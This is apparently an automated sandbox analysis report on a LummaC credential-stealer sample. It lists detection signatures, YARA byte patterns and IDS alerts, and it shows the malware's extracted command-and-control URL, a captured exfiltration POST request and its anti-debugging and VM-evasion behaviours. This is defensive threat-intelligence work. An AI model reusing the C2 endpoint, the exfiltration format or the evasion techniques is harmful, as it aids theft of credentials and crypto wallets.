Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Vd3tOP5WSD.exe

Overview

General Information

Sample name:Vd3tOP5WSD.exe
renamed because original name is a hash value
Original sample name:6b5e8356c9c11bb8018e49bacb31892460073945fb601b61cebdcf838ac6c5f1.exe
Analysis ID:1555042
MD5:d539e0fd4638f335e6ba827c71103e03
SHA1:8448a6b53a5be38ee721065161d20824368379f2
SHA256:6b5e8356c9c11bb8018e49bacb31892460073945fb601b61cebdcf838ac6c5f1
Tags:94-158-244-69exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Delayed program exit found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables driver privileges
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Vd3tOP5WSD.exe (PID: 2052 cmdline: "C:\Users\user\Desktop\Vd3tOP5WSD.exe" MD5: D539E0FD4638F335E6BA827C71103E03)
    • WerFault.exe (PID: 2572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 1564 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_1Yara detected LummaC StealerJoe Security
    dump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.3920154401.0000000000A38000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x16f0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          00000000.00000003.2148951176.00000000023C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Vd3tOP5WSD.exe.400000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              0.2.Vd3tOP5WSD.exe.400000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                0.3.Vd3tOP5WSD.exe.23c0000.0.raw.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                  0.3.Vd3tOP5WSD.exe.23c0000.0.unpackJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:52:13.306691+010020229301A Network Trojan was detected20.109.210.53443192.168.2.649773TCP
                    2024-11-13T10:52:50.913637+010020229301A Network Trojan was detected20.109.210.53443192.168.2.649983TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:51:26.431513+010020432061A Network Trojan was detected192.168.2.64985694.158.244.6980TCP
                    2024-11-13T10:51:26.431513+010020432061A Network Trojan was detected192.168.2.64998894.158.244.6980TCP
                    2024-11-13T10:52:26.013044+010020432061A Network Trojan was detected192.168.2.64980594.158.244.6980TCP
                    2024-11-13T10:52:44.132548+010020432061A Network Trojan was detected192.168.2.64990394.158.244.6980TCP
                    2024-11-13T10:52:53.138051+010020432061A Network Trojan was detected192.168.2.64995694.158.244.6980TCP
                    2024-11-13T10:53:01.909159+010020432061A Network Trojan was detected192.168.2.64998694.158.244.6980TCP
                    2024-11-13T10:53:20.128560+010020432061A Network Trojan was detected192.168.2.64998994.158.244.6980TCP
                    2024-11-13T10:53:20.849421+010020432061A Network Trojan was detected192.168.2.64999094.158.244.6980TCP
                    2024-11-13T10:53:38.222316+010020432061A Network Trojan was detected192.168.2.64999194.158.244.6980TCP
                    2024-11-13T10:53:47.017589+010020432061A Network Trojan was detected192.168.2.64999394.158.244.6980TCP
                    2024-11-13T10:53:56.106852+010020432061A Network Trojan was detected192.168.2.64999494.158.244.6980TCP
                    2024-11-13T10:54:05.000873+010020432061A Network Trojan was detected192.168.2.64999594.158.244.6980TCP
                    2024-11-13T10:54:13.834771+010020432061A Network Trojan was detected192.168.2.64999694.158.244.6980TCP
                    2024-11-13T10:54:22.617838+010020432061A Network Trojan was detected192.168.2.64999794.158.244.6980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T10:53:20.849421+010028438641A Network Trojan was detected192.168.2.64999094.158.244.6980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
                    Source: Vd3tOP5WSD.exeReversingLabs: Detection: 89%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Vd3tOP5WSD.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004052D9 CryptUnprotectData,0_2_004052D9

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeUnpacked PE file: 0.2.Vd3tOP5WSD.exe.400000.0.unpack
                    Source: Vd3tOP5WSD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009E216F FindFirstFileExW,0_2_009E216F
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_009E2223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009E2223

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49805 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49903 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49986 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49956 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49993 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49997 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49989 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49996 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49994 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49991 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49995 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49990 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49990 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49856 -> 94.158.244.69:80
                    Source: Network trafficSuricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.6:49988 -> 94.158.244.69:80
                    Source: Malware configuration extractorURLs: http://94.158.244.69/c2sock
                    Source: Joe Sandbox ViewIP Address: 94.158.244.69 94.158.244.69
                    Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49773
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.6:49983
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.158.244.69
                    Source: unknownHTTP traffic detected: POST /c2sock HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SqDe87817huf871793q74User-Agent: TeslaBrowser/5.5Content-Length: 16815Host: 94.158.244.69
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.15
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003477000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69//nhJ)
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/3-
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/4-G
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3923843389.000000000345D000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003484000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002940000.00000004.00000020.00020000.00000000.sdmp, Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sock-
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockA
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockD
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockPV
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2socks3
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3922174302.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/c2sockx
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/l
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/p
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.0000000002A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69/sIWi
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69:80/c2sock
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3923843389.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69:80/c2sock7
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69:80/c2sockJ
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.158.244.69:80/c2sockk
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3921069838.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3924235405.0000000003C61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3924235405.0000000003C61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3920570857.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3924235405.0000000003C61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3924235405.0000000003C61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                    Source: Vd3tOP5WSD.exe, 00000000.00000002.3924235405.0000000003C61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

                    System Summary

                    barindex
                    Source: 00000000.00000002.3920154401.0000000000A38000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.3919988047.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW,0_2_0040B81C
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00422177 NtQueryInformationProcess,0_2_00422177
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW,0_2_0040A928
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose,0_2_0040B129
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042F1C2 NtClose,0_2_0042F1C2
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004244E4 NtSetInformationThread,0_2_004244E4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004224A3 NtQueryInformationProcess,0_2_004224A3
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004245EC NtQuerySystemInformation,0_2_004245EC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00421EEB NtQueryInformationProcess,0_2_00421EEB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040B7BB lstrcmpW,NtClose,0_2_0040B7BB
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040B7F5 NtClose,0_2_0040B7F5
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040B81C0_2_0040B81C
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042C0DA0_2_0042C0DA
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004340800_2_00434080
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040E14E0_2_0040E14E
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040A9280_2_0040A928
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040B1290_2_0040B129
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042B9C50_2_0042B9C5
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004069A10_2_004069A1
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041F9A40_2_0041F9A4
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041C2700_2_0041C270
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042F2780_2_0042F278
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0040620B0_2_0040620B
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004302280_2_00430228
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004052D90_2_004052D9
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00436ADC0_2_00436ADC
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00405AAA0_2_00405AAA
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0043B3620_2_0043B362
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004024760_2_00402476
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042FD350_2_0042FD35
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042AD820_2_0042AD82
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042D6580_2_0042D658
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00430E6C0_2_00430E6C
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_00438E280_2_00438E28
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0042CFBA0_2_0042CFBA
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_0041204D0_2_0041204D
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004410570_2_00441057
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004150700_2_00415070
                    Source: C:\Users\user\Desktop\Vd3tOP5WSD.exeCode function: 0_2_004488000_2_00448800
